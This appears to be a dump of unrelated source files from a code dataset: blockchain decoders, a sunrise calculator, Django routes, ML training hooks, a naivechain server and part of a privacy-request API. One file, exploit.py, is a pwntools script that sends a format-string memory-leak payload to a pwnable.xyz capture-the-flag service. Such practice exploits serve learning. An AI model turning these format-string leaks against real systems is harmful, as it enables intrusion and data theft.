event.event_signature\n == \"0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef\"\n ):\n from_address = \"0x\" + event.parameters[0].value[-40:]\n to_address = \"0x\" + event.parameters[1].value[-40:]\n token_id = event.parameters[2].value\n value = event.parameters[2].value\n # TransferSingle event\n else:\n from_address = \"0x\" + event.parameters[1].value[-40:]\n to_address = \"0x\" + event.parameters[2].value[-40:]\n token_id = event.parameters[3].value\n value = event.parameters[4].value\n\n from_name = self._repository.get_address_label(\n event.chain_id, from_address, proxies\n )\n to_name = self._repository.get_address_label(\n event.chain_id, to_address, proxies\n )\n\n standard = self._repository.get_standard(\n event.chain_id, event.contract.address\n )\n\n if (\n event.event_signature\n == \"0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef\"\n and (standard == \"ERC20\" or event.contract.address in proxies)\n ):\n (\n _,\n token_symbol,\n token_decimals,\n _,\n ) = self._repository.get_token_data(\n event.chain_id, event.contract.address, proxies\n )\n try:\n value = value / 10**token_decimals\n except:\n value = 0\n\n transfers.append(\n DecodedTransfer(\n from_address=AddressInfo(\n address=from_address, name=from_name\n ),\n to_address=AddressInfo(address=to_address, name=to_name),\n token_standard=standard,\n token_address=event.contract.address,\n token_symbol=token_symbol,\n value=value,\n )\n )\n else:\n (\n _,\n token_symbol,\n token_decimals,\n _,\n ) = self._repository.get_token_data(\n event.chain_id, 
event.contract.address, proxies\n )\n\n if (\n event.event_signature\n == \"0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef\"\n ):\n value = 1\n else:\n value = int(value, 16) if type(value) == str else value\n\n if token_symbol == \"Unknown\":\n token_symbol = \"NFT\"\n\n if len(str(token_id)) > 8:\n token_symbol = (\n f\"{token_symbol} {str(token_id)[:6]}...\"\n f\"{str(token_id)[-2:]}\"\n )\n else:\n token_symbol = f\"{token_symbol} {token_id}\"\n token_address = f\"{event.contract.address}?a={token_id}#inventory\"\n transfers.append(\n DecodedTransfer(\n from_address=AddressInfo(\n address=from_address, name=from_name\n ),\n to_address=AddressInfo(address=to_address, name=to_name),\n token_standard=standard,\n token_address=token_address,\n token_symbol=token_symbol,\n value=value,\n )\n )\n\n return transfers\n","repo_name":"EthTx/ethtx","sub_path":"ethtx/decoders/abi/transfers.py","file_name":"transfers.py","file_ext":"py","file_size_in_byte":5854,"program_lang":"python","lang":"en","doc_type":"code","stars":444,"dataset":"github-code","pt":"76"} +{"seq_id":"39763923522","text":"#!/usr/bin/python3\n\nimport ezodf\nimport json\n\ndata = []\n\nspreadsheet = ezodf.opendoc('Kartoj_Listo.ods')\nsheet = spreadsheet.sheets[0]\nfor row in sheet.rows():\n\tdata_row = []\n\tfor cell in row:\n\t\tdata_row.append(cell.value)\n\tdata.append(data_row);\n\nprint(json.dumps(data))\n","repo_name":"mschmitt/JustOne-NurUnu","sub_path":"kartoj2json.py","file_name":"kartoj2json.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"69815707447","text":"\"\"\"\r\nsunrise/sunset calculation module\r\ncode adapted from:\r\n https://en.wikipedia.org/wiki/Sunrise_equation#Generalized_equation\r\n and\r\n https://gml.noaa.gov/grad/solcalc/solareqns.PDF\r\n\"\"\"\r\n\r\nimport datetime\r\nfrom math import sin, cos, tan, acos, pi\r\n\r\nfrom .geo import get_client_ip_address, get_latlong_from_ip_address\r\n\r\n\r\ndef is_leap(year):\r\n \"\"\" returns whether year is a leap year \"\"\"\r\n\r\n return (year % 4 == 0 and year % 100 != 0) or year % 400 == 0\r\n\r\ndef get_fractional_year(timetuple=None):\r\n \"\"\" calculates fractional year (gamma) \"\"\"\r\n\r\n if timetuple is None:\r\n timetuple = datetime.datetime.now().timetuple()\r\n day_of_year = timetuple.tm_yday\r\n hour = timetuple.tm_hour\r\n days_in_year = 365 + (1 if is_leap(timetuple.tm_year) else 0)\r\n return 2 * pi / days_in_year * (day_of_year - 1 + (hour - 12) / 24)\r\n\r\ndef get_equation_of_time(gamma):\r\n \"\"\" estimates eq of time in minutes \"\"\"\r\n\r\n return 229.18*(0.000075 + 0.001868 * cos(gamma) - 0.032077 * sin(gamma) - \\\r\n 0.014615 * cos(2 * gamma) - 0.040849 * sin(2 * gamma))\r\n\r\ndef get_solar_declination_angle(gamma):\r\n \"\"\" estimates solar declination angle in radians \"\"\"\r\n\r\n return 0.006918 - 0.399912 * cos(gamma) + 0.070257 * sin(gamma) - \\\r\n 0.006758 * cos(2 * gamma) + 0.000907 * sin(2 * gamma) - \\\r\n 0.002697 * cos(3 * gamma) + 0.00148 * sin(3 * gamma)\r\n\r\ndef get_sunrise_hour_angle(latitude, decl):\r\n \"\"\" calculates hour angle at sunrise in radians \"\"\"\r\n return acos((cos(90.833 * pi / 180) / (cos(latitude * pi / 180) * cos(decl))) - \\\r\n tan(latitude * pi / 180) * tan(decl))\r\n\r\ndef get_sunrise(longitude, hour_angle, eqtime):\r\n \"\"\" gets time of sunrise in minutes \"\"\"\r\n\r\n return 720 - 4 * (longitude + hour_angle * 180 / pi) - eqtime\r\n\r\ndef 
get_sunset(longitude, hour_angle, eqtime):\r\n \"\"\" gets time of sunset in minutes\"\"\"\r\n\r\n return 720 - 4 * (longitude - hour_angle * 180 / pi) - eqtime\r\n\r\ndef raw_minutes_to_time(mins, utc):\r\n \"\"\" converts raw minutes to hour:min with utc shift \"\"\"\r\n\r\n hour = mins / 60 + utc\r\n mins = int(60 * (hour - int(hour)))\r\n hour = int(hour)\r\n if mins < 10:\r\n mins = '0' + str(mins)\r\n return f'{hour}:{mins}'\r\n\r\ndef formatted_local_setrise(utc):\r\n \"\"\" returns tuple for (rise, set) \"\"\"\r\n\r\n latlong_tuple = get_latlong_from_ip_address(get_client_ip_address())\r\n if latlong_tuple is None:\r\n return None\r\n latitude, longitude, = latlong_tuple\r\n gamma = get_fractional_year()\r\n decl = get_solar_declination_angle(gamma)\r\n eqtime = get_equation_of_time(gamma)\r\n hour_angle = get_sunrise_hour_angle(latitude, decl)\r\n rise_mins = get_sunrise(longitude, hour_angle, eqtime)\r\n set_mins = get_sunset(longitude, hour_angle, eqtime)\r\n\r\n return raw_minutes_to_time(rise_mins, utc), raw_minutes_to_time(set_mins, utc)\r\n","repo_name":"jackdonofrio/alarmpi","sub_path":"utils/sun.py","file_name":"sun.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"73518816246","text":"import os\nimport subprocess\nimport sys\nimport unittest\nimport platform\n\n\nclass BlackFormattingTest(unittest.TestCase):\n def test_black_formatting(self):\n root_dir = os.path.normpath(os.path.join(__file__, \"..\"))\n res = subprocess.run(\n [\n self.get_black_path(),\n root_dir,\n \"--check\",\n \"--extend-exclude\",\n \"pytest-envs\",\n ],\n capture_output=True,\n )\n if res.returncode != 0:\n print(res.stdout.decode())\n print(res.stderr.decode(), file=sys.stderr)\n self.fail(\n (\n \"Not all python files are correctly formatted. 
\"\n \"Run 'python -m black ' to autoformat the files.\\n\"\n + res.stderr.decode()\n )\n )\n\n def get_black_path(self):\n folder_name = \"Scripts\" if platform.system() == \"Windows\" else \"bin\"\n return os.path.join(sys.prefix, folder_name, \"black\")\n","repo_name":"knime/knime-python","sub_path":"test_black_formatting.py","file_name":"test_black_formatting.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"76"} +{"seq_id":"35286017849","text":"from distutils.core import setup, Extension\nimport platform\n\n# original version\nVERSION=\"0.5\"\n\n# get current version\nwith open('brenda/version.py') as f:\n exec(f.read())\n\next_modules = []\n\nif platform.system() == 'Linux':\n ext_modules = [ Extension(\"paracurl\", [\"paracurl/paracurl.c\"],\n libraries=['curl']) ]\n\nsetup(name = \"Brenda\",\n version = VERSION,\n packages = [ 'brenda' ],\n scripts = [ 'brenda-work', 'brenda-tool', 'brenda-run', 'brenda-node', 'brenda-ebs' ],\n ext_modules = ext_modules,\n\n data_files=[('brenda/task-scripts', ['task-scripts/frame', 'task-scripts/subframe']),\n ('brenda/doc', ['README.md', 'doc/brenda-talk-blendercon-2013.pdf'])],\n\n author = \"James Yonan\",\n author_email = \"james@openvpn.net\",\n description = \"Blender render farm tool for Amazon Web Services\",\n)\n","repo_name":"jamesyonan/brenda","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":247,"dataset":"github-code","pt":"76"} +{"seq_id":"10770969090","text":"from mmcv.runner import HOOKS, Hook\nfrom torch.nn.utils import clip_grad\nimport torch\n\n\n@HOOKS.register_module()\nclass AccumulateOptimizerHook(Hook):\n\n def __init__(self, grad_clip=None, accumulate_factor=1, detect_anomaly=False):\n self.grad_clip = grad_clip\n assert isinstance(accumulate_factor, int)\n self.accumulate_factor = accumulate_factor\n self.detect_anomaly = detect_anomaly\n\n def clip_grads(self, params):\n params = list(\n filter(lambda p: p.requires_grad and p.grad is not None, params))\n if len(params) > 0:\n return clip_grad.clip_grad_norm_(params, **self.grad_clip)\n\n def after_train_iter(self, runner):\n if self.accumulate_factor == 1:\n runner.optimizer.zero_grad()\n if self.detect_anomaly:\n with torch.autograd.detect_anomaly():\n runner.outputs['loss'].backward()\n else:\n runner.outputs['loss'].backward()\n if self.grad_clip is not None:\n grad_norm = self.clip_grads(runner.model.parameters())\n if grad_norm is not None:\n # Add grad norm to the logger\n runner.log_buffer.update({'grad_norm': float(grad_norm)},\n runner.outputs['num_samples'])\n runner.optimizer.step()\n else:\n runner.outputs['loss'] = runner.outputs['loss'] / self.accumulate_factor\n if self.detect_anomaly:\n with torch.autograd.detect_anomaly():\n runner.outputs['loss'].backward()\n else:\n runner.outputs['loss'].backward()\n\n if (runner.iter + 1) % self.accumulate_factor == 0:\n if self.grad_clip is not None:\n grad_norm = self.clip_grads(runner.model.parameters())\n if grad_norm is not None:\n # Add grad norm to the logger\n runner.log_buffer.update({'grad_norm': float(grad_norm)},\n runner.outputs['num_samples'])\n runner.optimizer.step()\n 
runner.optimizer.zero_grad()\n","repo_name":"yongbin-buaa/bmvc22","sub_path":"mmocr/hooks/accumulate_optimizer_hook.py","file_name":"accumulate_optimizer_hook.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"37834924519","text":"#from run_bot import get_photos\n\n\nCATEG_LIST = 'Круто!\\n' \\\n 'Выбери категорию:\\n' \\\n '1.Самолеты\\n' \\\n '2.Животные\\n' \\\n '3.Птицы\\n' \\\n '4.Другое'\n\nPLANE_LIST = ['Введи цифру:\\n'\n '0.Все\\n'\n '1.Простые самолеты\\n'\n '',\n {''}]\nSHIPS_LIST = ''\nANIMALS_LIST = ['Введи число:\\n'\n '20.Все\\n'\n '21.Простые модели\\n'\n '22.Сложные модели\\n'\n '23.Составные модели', '258234980'] # put animals album id here\nFLOWERS_LIST = ''\nBIRDS_LIST = ''\nBOXES_LIST = ''\nBASE_LIST = ''\n","repo_name":"vlad-ostas/Innokentiy","sub_path":"ORIGAMI.py","file_name":"ORIGAMI.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"22845983592","text":"import unittest\n\nfrom aistore.sdk.errors import InvalidObjectRangeIndex\nfrom aistore.sdk.multiobj import ObjectRange\nfrom tests.unit.sdk.test_utils import test_cases\n\n\n# pylint: disable=unused-variable\nclass TestObjectRange(unittest.TestCase):\n def setUp(self):\n self.prefix = \"prefix-\"\n self.suffix = \"-suffix\"\n self.min_index = 4\n self.max_index = 9\n self.pad_width = 3\n self.step = 2\n\n def test_object_range_defaults(self):\n object_range = ObjectRange(\n prefix=self.prefix, min_index=self.min_index, max_index=self.max_index\n )\n self.assertEqual(\"prefix-{4..9..1}\", str(object_range))\n\n def test_object_range(self):\n object_range = ObjectRange(\n prefix=self.prefix,\n min_index=self.min_index,\n max_index=self.max_index,\n pad_width=self.pad_width,\n step=self.step,\n suffix=self.suffix,\n )\n self.assertEqual(\"prefix-{004..009..2}-suffix\", str(object_range))\n\n def test_object_range_prefix_only(self):\n object_range = ObjectRange(prefix=self.prefix)\n self.assertEqual(\"prefix-\", str(object_range))\n\n def test_object_range_invalid_suffix(self):\n with self.assertRaises(ValueError):\n ObjectRange(prefix=self.prefix, suffix=\"anything\")\n\n @test_cases(\n (1, 25, 0, True),\n (25, 1, 0, False),\n (20, 25, 1, False),\n (None, 25, 1, False),\n (0, None, 1, False),\n (20, 25, 2, True),\n (20, 25, 3, True),\n )\n def test_validate_indices(self, test_case):\n min_index, max_index, pad_width, valid = test_case\n if valid:\n ObjectRange(\n prefix=self.prefix,\n min_index=min_index,\n max_index=max_index,\n pad_width=pad_width,\n )\n return\n with self.assertRaises(InvalidObjectRangeIndex):\n ObjectRange(\n prefix=self.prefix,\n min_index=min_index,\n max_index=max_index,\n pad_width=pad_width,\n )\n\n def test_iter(self):\n object_range = ObjectRange(\n prefix=self.prefix,\n min_index=self.min_index,\n max_index=self.max_index,\n pad_width=self.pad_width,\n step=self.step,\n suffix=self.suffix,\n )\n expected_range = [\"prefix-004-suffix\", \"prefix-006-suffix\", \"prefix-008-suffix\"]\n self.assertEqual(expected_range, list(object_range))\n","repo_name":"NVIDIA/aistore","sub_path":"python/tests/unit/sdk/multiobj/test_object_range.py","file_name":"test_object_range.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","stars":948,"dataset":"github-code","pt":"76"} +{"seq_id":"21285089572","text":"from django.conf.urls import url\nfrom . 
import views\n\napp_name = 'forum'\n\n\nurlpatterns = [\n\n    # /forum/\n    url(r'^$', views.IndexView.as_view(), name='index'),\n\n    # /forum/read\n    url(r'^read/$', views.ReadView.as_view(), name='read'),\n\n    # /forum/profile\n    url(r'^profile/$', views.MyView.as_view(), name='profile'),\n\n    # /forum/id\n    url(r'^(?P<pk>[0-9]+)$', views.DetailView.as_view(), name='detail'),\n\n    # /forum/question/add\n    url(r'question/add/$', views.QuestionCreate.as_view(), name='question-add'),\n\n    # /forum/question/pk\n    url(r'question/(?P<pk>[0-9]+)/$', views.QuestionUpdate.as_view(), name='question-update'),\n\n    # /forum/question/pk/delete\n    url(r'question/(?P<pk>[0-9]+)/delete/$', views.QuestionDelete.as_view(), name='question-delete'),\n\n    # /forum/question/pk/ans\n    url(r'question/(?P<pk>[0-9]+)/ans/$', views.AnswerCreate.as_view(), name='answer-add'),\n\n    # /forum/answer/update/pk\n    url(r'answer/update/(?P<pk>[0-9]+)/$', views.AnswerUpdate.as_view(), name='answer-update'),\n\n    # /forum/answer//delete/pk\n    url(r'answer/delete/(?P<pk>[0-9]+)/$', views.AnswerDelete.as_view(), name='answer-delete'),\n\n    # /forum/register\n    url(r'^register/$',views.UserFormView.as_view(), name='register'),\n\n    # /forum/logout\n    url(r'^forum/logout/$', 'django.contrib.auth.views.logout', {'next_page': '/forum/login'}, name='logout'),\n\n    # /forum/login\n    url(r'^login/$', views.login_user, name='login'),\n\n    # /forum/maker\n    url(r'^maker/$', views.update_profile, name='adminMaker'),\n\n\n]\n","repo_name":"shagunbandi/Q-A-Website","sub_path":"forum/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"18045745913","text":"#!/usr/bin/python\nfrom pwn import *\nimport re\n\nfinder = re.compile(\"0x[0-9a-f]+\")\n\n# proc = process(\"./GrownUpRedist\")\nproc = remote(\"svc.pwnable.xyz\", 30004)\n\ncontext.terminal = ['tmux', 'splitw', '-v']\n# gdb.attach(proc)\n\n# raw_input(\"Waiting for first input..\")\n\nprint(proc.read())\nproc.write('y' * 8 + p64(0x601080))\n# proc.writeline(\"YYYY\")\n\nprint(proc.read())\n# 5 for bypass registers, 3 for stacks\nf_string = \"%c\" * 5 + \"%c\" * 3 + \"%s\"\nproc.write('A' * 32 + f_string + 'A' * (0x80 - 32 - len(f_string)))\n\nret = proc.read()\nprint(ret)\n\n# raw_list = finder.findall(ret)\n#\n# for hex_string in raw_list :\n#     print(\"Trying %s\" % hex_string)\n#     try :\n#         print(hex_string[2:].decode(\"hex\"))\n#     except :\n#         pass\n\nproc.interactive()\n\n","repo_name":"KwonL/CTF-practice","sub_path":"2019/pwnable_xyz/05_GrownUp/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"11557404114","text":"import Guess\nimport Hangman\n\ndef choosing_game():\n    print('*' * 20)\n    print('     Choose your game')\n    print('*' * 20)\n\n    print('(1) Hangman Game    (2) Guessing Game ')\n\n    game = int(input(\"Which game will you play ? 
\"))\n\n if game == 1:\n print(\"Playing Hangman Game...\\n\")\n Hangman.playing()\n elif game == 2:\n print(\"Playing Guessing Game...\\n\")\n Guess.playing()\n\nif (__name__ == \"__main__\"):\n choosing_game()\n","repo_name":"Vinicius-2003/PythonIniciante","sub_path":"Jogo/jogos.py","file_name":"jogos.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"11350876669","text":"import operator\nimport select\nimport socket\nfrom collections import namedtuple\nfrom . import protocol, client\nfrom ..naivechain import base\nfrom ..naivechain import blockchain\nfrom ..naivechain import block\n\n\nclass ChainContainer(base.Root):\n\n def __init__(self):\n self.chain = blockchain.BlockChain()\n\n def __str__(self) -> str:\n return self.chain.get_data()\n\n def add_block(self, block: block.Block) -> bool:\n ret = True\n try:\n self.chain.add_block(block)\n except blockchain.InconsictentBlockChainException:\n ret = False\n return ret\n\n def add(self, data) -> bool:\n block = self.chain.generate_next_block(data)\n return self.add_block(block)\n\n def get(self, index: int) -> block.Block:\n try:\n return self.chain.blocks[index]\n except IndexError:\n pass\n\n def get_last_index(self) -> int:\n return len(self.chain.blocks)\n\n\nclass NaiveServerBaseState(base.LoggedRoot):\n\n handlers = (\n # 0 - position is msg_type, 1 - prop in global state, 2 - method in specific state\n ('_discover', 'broadcast_handler',),\n ('_discover', 'ping_handler',),\n ('_exchange', 'get_chain_handler',),\n ('_exchange', 'update_clients_handler',),\n )\n\n @classmethod\n def select_msg_handler(cls, state: 'NaiveServerBaseState', msg_type: int) -> callable:\n if msg_type < len(cls.handlers):\n state_instance = getattr(state.root, cls.handlers[msg_type][0])\n handler = getattr(state_instance, cls.handlers[msg_type][1])\n return handler\n return lambda data, address: state.root.log(f\"Handler not found for \"\n f\"{msg_type}{protocol.NaiveMessagesProto.DELIMITER}\"\n f\"{data}({address})\")\n\n def __init__(self, server: 'NaiveServer', root: 'NaiveServerGlobalState') -> None:\n self.server = server\n self.root = root\n\n def handle(self, msg_type: int, data: str, address: str) -> None:\n self.select_msg_handler(self, msg_type)(data, address)\n\n\nclass NaiveServerDiscoverState(NaiveServerBaseState):\n\n BROADCAST_COUNTER_LIMIT = 10\n\n def __init__(self, server: 'NaiveServer', root: 'NaiveServerGlobalState') -> None:\n super().__init__(server, root)\n self._broadcast_counter = self.BROADCAST_COUNTER_LIMIT\n\n def _increment_broadcast(self) -> bool:\n self._broadcast_counter += 1\n if self._broadcast_counter > self.BROADCAST_COUNTER_LIMIT:\n self._broadcast_counter = 0\n return True\n return False\n\n def broadcast_handler(self, data: str, address: str):\n self.server.client.send_ping(protocol.NaiveMessagesProto.DEFAULT_PORT,\n address, self.root.container.get_last_index())\n if self.root.add_node(address, int(data)):\n self.log(f'Handle broadcast from `{address}` with \\'{data}\\'')\n else:\n if self._increment_broadcast():\n self.server.client.send_broadcast(protocol.NaiveMessagesProto.DEFAULT_PORT,\n self.root.container.get_last_index())\n self.log('Send broadcast')\n else:\n self.log(f'Listening broadcast...')\n\n def ping_handler(self, data: str, address: str):\n if self.root.add_node(address, int(data)):\n self.log(f'Handle ping from `{address}` with \\'{data}\\' (add new node or renew existing one)')\n else:\n 
self.log(f'Handle ping from `{address}` with \\'{data}\\' (do nothing)')\n\n sorted_nodes = sorted(self.root.known_nodes.items(), key=operator.itemgetter(1), reverse=True)\n if self.root.container.get_last_index() < sorted_nodes[0][1]:\n needed_index = self.root.container.get_last_index()\n self.log(f\"Neighbour {sorted_nodes[0][0]} has more \"\n f\"actual chain, synchronizing (needed_index={needed_index})\")\n self.server.client.send_get_chain(protocol.NaiveMessagesProto.DEFAULT_PORT,\n sorted_nodes[0][0], needed_index)\n\n\nclass NaiveServerExchangeState(NaiveServerBaseState):\n\n def get_chain_handler(self, data: str, address: str):\n self.log(f'GET_CHAIN with {data} from {address}')\n self.server.client.send_update_clients(protocol.NaiveMessagesProto.DEFAULT_PORT,\n address, self.root.container.get(int(data)))\n\n def update_clients_handler(self, data: str, address: str):\n self.log(f'UPDATE_CLIENTS with {data} from {address}')\n try:\n new_block = block.Block.deserialize(data)\n except Exception:\n is_added = False\n else:\n is_added = self.root.container.add_block(new_block)\n\n if not is_added:\n self.log(f'Can\\'t add {data}, will try it later')\n\n\nclass NaiveServerGlobalState(NaiveServerBaseState):\n\n DEFAULT_TYPE = -1\n active_state_constructor = namedtuple('ActiveState', ('msg_type', 'data', 'address'))\n\n def __init__(self, server: 'NaiveServer', root=None) -> None:\n super().__init__(server, self)\n self.known_nodes = {'127.0.0.1': 0}\n self.container = ChainContainer()\n self._discover = NaiveServerDiscoverState(server, self)\n self._exchange = NaiveServerExchangeState(server, self)\n self._active_state = self.active_state_constructor(0, 0, '') # listen broadcast\n\n def add_node(self, address: str, weight: int = 0) -> bool:\n if not address or self.known_nodes.get(address) == weight:\n return False\n\n self.known_nodes[address] = weight\n return True\n\n def handle(self, msg_type: int, data: str = None, address: str = None) -> None:\n if msg_type == self.DEFAULT_TYPE:\n super().handle(*self._active_state)\n else:\n super().handle(msg_type, data, address)\n\n\nclass NaiveServer(base.LoggedRoot):\n\n CHUNK_SIZE = 1024\n TIMEOUT = 2\n\n def __init__(self, port: int = protocol.NaiveMessagesProto.DEFAULT_PORT) -> None:\n self.port = port\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.socket.setblocking(0)\n self.socket.bind(('0.0.0.0', self.port))\n self.is_working = True\n self.state = NaiveServerGlobalState(self)\n self.client = client.NaiveClient()\n self.log('Bind', self.socket)\n\n def disable(self):\n self.is_working = False\n\n def _listen(self) -> None:\n while self.is_working:\n self.log('Waiting for data...')\n ready = select.select((self.socket,), tuple(), tuple(), self.TIMEOUT)\n if not ready[0]:\n self.state.handle(NaiveServerGlobalState.DEFAULT_TYPE)\n continue\n\n raw_data, address = self.socket.recvfrom(self.CHUNK_SIZE)\n msg_type, payload = protocol.NaiveMessagesProto.decode(raw_data)\n self.log(':'.join(str(x) for x in address), 'Received data:', raw_data)\n self.state.handle(int(msg_type), payload, address[0])\n\n def listen(self) -> None:\n try:\n self._listen()\n except KeyboardInterrupt:\n self.log(f'Known nodes: {self.state.known_nodes}')\n self.log(f'Blockchain:\\n{self.state.container}')\n\n","repo_name":"irr123/py-naivechain","sub_path":"naivenet/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":7443,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} 
+{"seq_id":"17867404216","text":"'''\n\n编写程序,生成一个包含20个随机整数的列表,\n然后对其中偶数下标(下标即列表元素的索引)的元素进行降序排列,\n奇数下标的元素不变。\n(提示:使用切片。) (20分:生成列表5分,找到偶数下标8分,降序7分)\n\n'''\n\nimport random\n\nlist0 = []\n\nfor i in range(20):\n list0.append(random.randint(1,50)) #生成一个包含20个随机整数的列表\n\nprint('原始序列:',list0)\n# print(len(list0))\n\n# for i in range(0,len(list0),2):\n# for j in range(i+2,len(list0),2):\n# if i < len(list0)-2: #防止下标越界\n#\n# if list0[i] PrivacyRequest:\n \"\"\"Load the privacy request or throw a 404\"\"\"\n logger.info(\"Finding privacy request with id '{}'\", privacy_request_id)\n\n privacy_request = PrivacyRequest.get(db, object_id=privacy_request_id)\n\n if not privacy_request:\n raise HTTPException(\n status_code=HTTP_404_NOT_FOUND,\n detail=f\"No privacy request found with id '{privacy_request_id}'.\",\n )\n\n return privacy_request\n\n\n@router.post(\n PRIVACY_REQUESTS,\n status_code=HTTP_200_OK,\n response_model=BulkPostPrivacyRequests,\n)\ndef create_privacy_request(\n *,\n db: Session = Depends(deps.get_db),\n config_proxy: ConfigProxy = Depends(deps.get_config_proxy),\n data: conlist(PrivacyRequestCreate, max_items=50) = Body(...), # type: ignore\n) -> BulkPostPrivacyRequests:\n \"\"\"\n Given a list of privacy request data elements, create corresponding PrivacyRequest objects\n or report failure and execute them within the Fidesops system.\n You cannot update privacy requests after they've been created.\n \"\"\"\n return create_privacy_request_func(db, config_proxy, data, False)\n\n\n@router.post(\n PRIVACY_REQUEST_AUTHENTICATED,\n status_code=HTTP_200_OK,\n dependencies=[Security(verify_oauth_client, scopes=[PRIVACY_REQUEST_CREATE])],\n response_model=BulkPostPrivacyRequests,\n)\ndef create_privacy_request_authenticated(\n *,\n db: Session = Depends(deps.get_db),\n config_proxy: ConfigProxy = Depends(deps.get_config_proxy),\n data: conlist(PrivacyRequestCreate, max_items=50) = Body(...), # type: ignore\n) -> BulkPostPrivacyRequests:\n \"\"\"\n Given a list of privacy request data elements, create corresponding PrivacyRequest objects\n or report failure and execute them within the Fidesops system.\n You cannot update privacy requests after they've been created.\n This route requires authentication instead of using verification codes.\n \"\"\"\n return create_privacy_request_func(db, config_proxy, data, True)\n\n\ndef _send_privacy_request_receipt_message_to_user(\n policy: Optional[Policy],\n to_identity: Optional[Identity],\n service_type: Optional[str],\n) -> None:\n \"\"\"Helper function to send request receipt message to the user\"\"\"\n if not to_identity:\n logger.error(\n IdentityNotFoundException(\n \"Identity was not found, so request receipt message could not be sent.\"\n )\n )\n return\n if not policy:\n logger.error(\n PolicyNotFoundException(\n \"Policy was not found, so request receipt message could not be sent.\"\n )\n )\n return\n request_types: Set[str] = set()\n for action_type in ActionType:\n if policy.get_rules_for_action(action_type=ActionType(action_type)):\n request_types.add(action_type)\n dispatch_message_task.apply_async(\n queue=MESSAGING_QUEUE_NAME,\n kwargs={\n \"message_meta\": FidesopsMessage(\n action_type=MessagingActionType.PRIVACY_REQUEST_RECEIPT,\n body_params=RequestReceiptBodyParams(request_types=request_types),\n ).dict(),\n \"service_type\": service_type,\n \"to_identity\": to_identity.dict(),\n },\n )\n\n\ndef privacy_request_csv_download(\n db: Session, privacy_request_query: Query\n) -> StreamingResponse:\n \"\"\"Download privacy requests as 
CSV for Admin UI\"\"\"\n f = io.StringIO()\n csv_file = csv.writer(f)\n\n csv_file.writerow(\n [\n \"Status\",\n \"Request Type\",\n \"Subject Identity\",\n \"Custom Privacy Request Fields\",\n \"Time Received\",\n \"Reviewed By\",\n \"Request ID\",\n \"Time Approved/Denied\",\n \"Denial Reason\",\n ]\n )\n privacy_request_ids: List[str] = [r.id for r in privacy_request_query]\n denial_audit_log_query: Query = db.query(AuditLog).filter(\n AuditLog.action == AuditLogAction.denied,\n AuditLog.privacy_request_id.in_(privacy_request_ids),\n )\n denial_audit_logs: Dict[str, str] = {\n r.privacy_request_id: r.message for r in denial_audit_log_query\n }\n\n for pr in privacy_request_query:\n denial_reason = (\n denial_audit_logs[pr.id]\n if pr.status == PrivacyRequestStatus.denied and pr.id in denial_audit_logs\n else None\n )\n\n csv_file.writerow(\n [\n pr.status.value if pr.status else None,\n pr.policy.rules[0].action_type if len(pr.policy.rules) > 0 else None,\n pr.get_persisted_identity().dict(),\n pr.get_persisted_custom_privacy_request_fields(),\n pr.created_at,\n pr.reviewed_by,\n pr.id,\n pr.reviewed_at,\n denial_reason,\n ]\n )\n\n f.seek(0)\n response = StreamingResponse(f, media_type=\"text/csv\")\n response.headers[\n \"Content-Disposition\"\n ] = f\"attachment; filename=privacy_requests_download_{datetime.today().strftime('%Y-%m-%d')}.csv\"\n return response\n\n\ndef execution_and_audit_logs_by_dataset_name(\n self: PrivacyRequest,\n) -> DefaultDict[str, List[Union[\"AuditLog\", \"ExecutionLog\"]]]:\n \"\"\"\n Returns a combined mapping of execution and audit logs for the given privacy request.\n\n Audit Logs are for the entire privacy request as a whole, while execution logs are created for specific collections.\n Logs here are grouped by dataset, but if it is an audit log, it is just given a fake dataset name, here \"Request + status\"\n ExecutionLogs for each dataset are truncated.\n\n Added as a conditional property to the PrivacyRequest class at runtime to\n show optionally embedded execution and audit logs.\n\n An example response might include your execution logs from your mongo db in one group, and execution logs from\n your postgres db in a different group, plus audit logs for when the request was approved and denied.\n \"\"\"\n db: Session = Session.object_session(self)\n all_logs: DefaultDict[str, List[Union[\"AuditLog\", \"ExecutionLog\"]]] = defaultdict(\n list\n )\n\n execution_log_query: Query = db.query(\n ExecutionLog.id,\n ExecutionLog.created_at,\n ExecutionLog.updated_at,\n ExecutionLog.message,\n cast(ExecutionLog.status, sqlalchemy.String).label(\"status\"),\n ExecutionLog.privacy_request_id,\n ExecutionLog.dataset_name,\n ExecutionLog.collection_name,\n ExecutionLog.connection_key,\n ExecutionLog.fields_affected,\n ExecutionLog.action_type,\n null().label(\"user_id\"),\n ).filter(ExecutionLog.privacy_request_id == self.id)\n\n audit_log_query: Query = db.query(\n AuditLog.id,\n AuditLog.created_at,\n AuditLog.updated_at,\n AuditLog.message,\n cast(AuditLog.action.label(\"status\"), sqlalchemy.String).label(\"status\"),\n AuditLog.privacy_request_id,\n 